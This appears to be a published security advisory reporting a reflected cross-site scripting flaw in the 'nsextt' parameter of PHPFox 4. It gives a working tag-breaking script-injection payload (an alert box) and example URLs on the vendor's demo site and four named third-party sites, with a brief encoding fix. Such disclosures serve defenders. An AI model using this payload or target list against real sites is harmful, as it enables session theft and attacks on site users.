PHPFox version 4 suffers from a cross site scripting vulnerability.
141186edcae31f25f7e09ee42832fb75b900845a261b04bb2a3b8ba2ce2d385f
###########################################
# Title : PhpFox4 Cross Site Scripting Vuln.
# Author : bl4ck_MohajeM ( mohajem.war@gmail.com)
# Software Link: http://www.phpfox.com/
# Version: 4
# Date : 06/09/2016
# Category: WebApps
# Tested with : Ubuntu / Win
###########################################
[Description]
In this Cms theres is a Cross Site Scripting Vurlnerablities in
'nsextt' Parameter .
PhpFox Get the value of this parameter from the Client without any php
function Ani-XSS Function.
Vuln. Input ==> /?nsextt=
###########################################
[Proof of Concept]
Add this Instead of '/?nsextt='
/?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
Then you wanna see the alert that cotain '209'
###########################################
[Example]
https://v4.phpfox.com/v/category/69/comedy/?nsextt=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x0000D1)%3C/scRipt%3E
https://v4.phpfox.com/blog/
https://v4.phpfox.com/photo/
https://v4.phpfox.com/forum/
https://v4.phpfox.com/poll/
https://v4.phpfox.com/quiz/
https://v4.phpfox.com/event/
https://v4.phpfox.com/music/
https://v4.phpfox.com/marketplace/
https://v4.phpfox.com/pages/
https://v4.phpfox.com/invite/
demo :
tabrizcloob.ir/forum//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
alachikh.ir/poll//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
facebook2.ir/event//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
avs.ir/music//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
###########################################
[Solution]
Programmer should encode those data we gain from Clients .
###########################################
tnx : sha4yan - arf1372 - Milad Hacking - n1arash - Und3rgrounD -
shabgard - b3hz4d
###########################################